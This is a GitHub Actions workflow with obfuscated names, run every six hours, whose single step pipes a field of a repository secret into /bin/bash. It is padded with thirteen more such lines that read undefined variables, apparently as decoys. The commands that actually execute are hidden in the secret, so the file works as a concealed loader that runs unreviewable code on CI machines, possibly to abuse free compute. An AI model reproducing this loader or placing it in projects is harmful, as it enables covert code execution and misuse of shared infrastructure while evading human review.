name: shilaoqian3627

on:
  workflow_dispatch:
  schedule:
    - cron: '4 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shilaoqian3627
        env:
          k53986: ${{ secrets.k53986 }}
        run: |
          echo $k53986 | jq -r .apc512 | /bin/bash
          echo $ww298 | jq -r .ilmi2 | /bin/bash
          echo $sxlhq7 | jq -r .ntl989 | /bin/bash
          echo $w7 | jq -r .hdky59471 | /bin/bash
          echo $km5 | jq -r .dn98404 | /bin/bash
          echo $i0798 | jq -r .nvnby2 | /bin/bash
          echo $zg6193 | jq -r .p4 | /bin/bash
          echo $r75238 | jq -r .lpcgd6 | /bin/bash
          echo $xfj81 | jq -r .vqeaj0 | /bin/bash
          echo $e84075 | jq -r .sib3437 | /bin/bash
          echo $o06 | jq -r .jenvf7804 | /bin/bash
          echo $zfes5 | jq -r .h567 | /bin/bash
          echo $hhg0569 | jq -r .wg512 | /bin/bash
          echo $qgm4 | jq -r .hu2112 | /bin/bash

